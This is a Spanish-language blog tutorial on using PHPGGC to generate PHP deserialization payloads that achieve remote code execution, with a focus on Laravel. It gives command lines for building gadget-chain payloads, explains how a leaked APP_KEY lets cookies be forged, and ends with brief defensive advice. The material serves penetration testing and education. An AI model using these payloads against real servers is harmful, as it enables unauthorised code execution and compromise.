PHPGGC: Explotación de Deserialización PHP

 

 https://www.onlinetis.com/es/

PHPGGC: Explotación de Deserialización PHP

PHPGGC (PHP Generic Gadget Chains) es una herramienta de línea de comandos indispensable para auditores de seguridad y pentesters que trabajan con aplicaciones PHP. Se utiliza específicamente para explotar vulnerabilidades de deserialización insegura.

Aquí tienes una guía rápida en español sobre qué es y cómo usarla en Kali Linux.

¿Qué hace PHPGGC?

Cuando una aplicación PHP utiliza la función unserialize() con datos que un usuario puede controlar, un atacante puede enviar un "objeto" malicioso. PHPGGC contiene una librería de "gadgets" (fragmentos de código existentes en frameworks populares como Laravel, Symfony o Guzzle) que, al combinarse, permiten ejecutar comandos en el servidor (RCE).

Instalación en Kali Linux

Aunque puedes clonar el repositorio, lo más común es descargarlo directamente:

  1. Clona el repositorio:

    Bash
    git clone https://github.com/ambionics/phpggc.git

  2. Entra al directorio:

    Bash
    cd phpggc

  3. Dale permisos de ejecución:

    Bash
    chmod +x phpggc

Comandos Principales

1. Listar los gadgets disponibles

Para ver qué frameworks y librerías son soportados, ejecuta:

Bash
./phpggc -l

Esto te mostrará una lista (por ejemplo: Laravel/RCE1, Monolog/RCE2, SwiftMailer/FW1, etc.).

2. Buscar un gadget específico

Si sabes que la víctima usa Laravel, puedes filtrar:

Bash
./phpggc -l Laravel

3. Generar un Payload

Para generar un objeto serializado que ejecute un comando (por ejemplo, whoami), la sintaxis básica es:

Bash
./phpggc <NombreDelGadget> <Función> <Comando>

Ejemplo real usando Monolog:

Bash
./phpggc Monolog/RCE1 system "id"

Esto generará una cadena de texto extraña (serializada) que deberás enviar al parámetro vulnerable de la web.

Opciones Útiles

  • Codificación: Muchas veces los payloads tienen caracteres no imprimibles. Puedes usar -u para URL-encode o -b para Base64.

    Bash
    ./phpggc -b Monolog/RCE1 system "uname -a"

  • Formato de salida: Si necesitas el payload para un script en Python o PHP, puedes usar -o.

  • Fast-destruct: Algunos gadgets necesitan que el objeto sea destruido inmediatamente para ejecutarse; usa la bandera -f.

¿Cuándo usarlo?

Solo funcionará si:

  1. La aplicación tiene un punto de entrada con unserialize().

  2. La aplicación utiliza una de las librerías que PHPGGC tiene en su base de datos.

  3. Conoces la versión de la librería (o vas probando mediante ensayo y error).

Nota de seguridad: Utiliza esta herramienta solo en entornos controlados o auditorías autorizadas. La deserialización es una de las vulnerabilidades más críticas en aplicaciones web modernas.

 

Si estás trabajando con Laravel y quieres usar PHPGGC, estás en el terreno de una de las superficies de ataque más comunes en auditorías de aplicaciones PHP. Laravel es un framework robusto, pero si utiliza unserialize() en cookies, sesiones o entradas de base de datos, PHPGGC tiene "cadenas" (gadgets) muy potentes para explotarlo.

Aquí te explico cómo enfocarlo específicamente para Laravel:

1. Identificar Gadgets para Laravel

Laravel ha evolucionado y PHPGGC se actualiza constantemente para cubrir sus versiones. Para ver qué tienes disponible para este framework, usa:

Bash
./phpggc -l Laravel

Verás resultados como:

  • Laravel/RCE1 a RCE7: Diferentes cadenas para ejecutar comandos (Remote Code Execution).

  • Laravel/RCE9 (v5.4.0 a v9.1.8+): Una de las más versátiles que utiliza GuzzleHttp.

2. Generar el Payload

Supongamos que has confirmado que una aplicación Laravel (versión 8 o 9) es vulnerable. Quieres ejecutar un ping a tu servidor para confirmar la ejecución.

Comando básico:

Bash
./phpggc Laravel/RCE9 system "ping -c 4 tu-ip-o-dominio.com"

3. El factor "App Key" y las Cookies

En Laravel, la deserialización insegura suele ocurrir en las cookies. Sin embargo, Laravel firma y cifra las cookies usando la APP_KEY (definida en el archivo .env).

  • Si NO tienes la APP_KEY: No podrás cifrar el payload de PHPGGC de forma que Laravel lo acepte.

  • Si TIENES la APP_KEY: Puedes usar herramientas como yoserial.net o scripts personalizados en PHP para envolver el output de PHPGGC en el formato de cifrado de Laravel (AES-256-CBC o AES-128-CBC).

4. Ejemplo Práctico: Payload en Base64

Muchos vectores de ataque requieren que el payload sea una cadena de texto limpia. Usa la opción -b:

Bash
./phpggc -b Laravel/RCE7 system "id"

Esto te devolverá un string largo en Base64 que representa el objeto malicioso.

Tabla de Compatibilidad (Resumen)

GadgetVersión Laravel EstimadaDependencia Principal
RCE15.4.xIlluminate\Broadcasting
RCE55.5.x - 5.8.xFaker\Generator
RCE95.4.0 - 9.x+GuzzleHttp\Cookie

¿Cómo prevenir esto en Laravel?

Si estás del lado de la defensa (Blue Team), para proteger una app Laravel debes:

  1. Nunca usar unserialize() con datos que vengan del usuario ($_GET, $_POST, $_COOKIE).

  2. Utilizar json_decode() y json_encode() para manejar datos estructurados.

  3. Mantener las dependencias actualizadas (composer update), ya que Laravel y Guzzle suelen parchear los puntos donde PHPGGC encuentra "gadgets".

Location: España

Entradas populares de este blog

Hacking y ciberseguridad en kali linux con Fping

Imagen
  www.onlinetis.com   Hacking y ciberseguridad en kali linux con Fping Fping es un programa similar a ping que utiliza la solicitud de eco del Protocolo de Mensajes de Control de Internet (ICMP) para determinar si un host objetivo responde. fping se diferencia de ping en que permite especificar cualquier número de objetivos en la línea de comandos o un archivo con las listas de objetivos a los que se hará ping. En lugar de enviar a un objetivo hasta que se agote el tiempo de espera o responda, fping envía un paquete de ping y pasa al siguiente objetivo mediante un sistema de turnos rotatorios. Como instalar:  sudo apt install fping fping Enviar paquetes ICMP ECHO_REQUEST a los hosts de la red   fping6 Compatibilidad con versiones anteriores de fping anteriores a la versión 4.0 El comando fping en Kali Linux es una utilidad de red que se utiliza para enviar paquetes de ICMP (Protocolo de mensajes de control de Internet) a varios hosts de forma simultánea. A diferen...
LEER MAS »

Hacking y ciberseguridad en kali linux con atk6-thcping6

Imagen
www.onlinetis.com Hacking y ciberseguridad en kali linux con atk6-thcping6 Parece que estás interesado en usar atk6-thcping6 en Kali Linux. Esta herramienta es parte del conjunto de utilidades thc-ipv6 , diseñado para probar las debilidades del protocolo IPv6. Para usar atk6-thcping6 , primero necesitas tener instalado el paquete thc-ipv6 . En la mayoría de las distribuciones de Kali, ya viene preinstalado, pero si no, puedes instalarlo con el siguiente comando: Bash sudo apt install thc-ipv6 Una vez que lo tienes instalado, la sintaxis básica para atk6-thcping6 es: Bash atk6-thcping6 <interface> <target> [opciones] Aquí está el desglose de los argumentos y opciones más comunes: <interface> : La interfaz de red que usarás para enviar el paquete. Por ejemplo, eth0 , wlan0 , etc. <target> : La dirección IPv6 del objetivo al que quieres hacer ping. [opciones] : Puedes usar varias opciones para modificar el comportamiento del ping. La mejor manera de ver todas la...
LEER MAS »

Como utilizar Fierce en kali linux

Imagen
  www.onlinetis.com   Como utilizar Fierce en kali linux Fierce es un escáner semiligero que ayuda a localizar direcciones IP no contiguas y nombres de host en dominios específicos. Está pensado como precursor de nmap, unicornscan, nessus, nikto, etc., ya que todos ellos requieren que se conozca previamente el espacio IP buscado. No realiza exploits ni escanea internet indiscriminadamente. Está diseñado específicamente para localizar objetivos probables tanto dentro como fuera de una red corporativa. Dado que utiliza principalmente DNS, es frecuente encontrar redes mal configuradas que filtran el espacio de direcciones interno. Esto es especialmente útil en malware dirigido. Originalmente escrito por RSnake y otros en http://ha.ckers.org/. Se trata simplemente de una conversión a Python 3 para simplificar y modernizar el código base. Como instalar: sudo apt install fierce Escáner DNS que ayuda a localizar espacios de IP no contiguos y nombres de host contra dominios específico...
LEER MAS »